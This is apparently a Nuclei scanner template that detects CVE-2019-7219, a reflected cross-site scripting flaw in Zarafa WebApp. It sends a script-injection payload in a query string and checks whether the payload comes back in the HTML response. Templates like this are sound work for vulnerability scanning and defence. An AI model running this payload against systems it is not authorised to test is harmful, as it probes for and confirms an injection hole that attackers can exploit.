id: CVE-2019-7219

info:
  name: Zarafa WebApp Reflected XSS
  author: pd-team
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"><script>alert(1)</script>"
      - type: word
        part: header
        words:
          - "/html"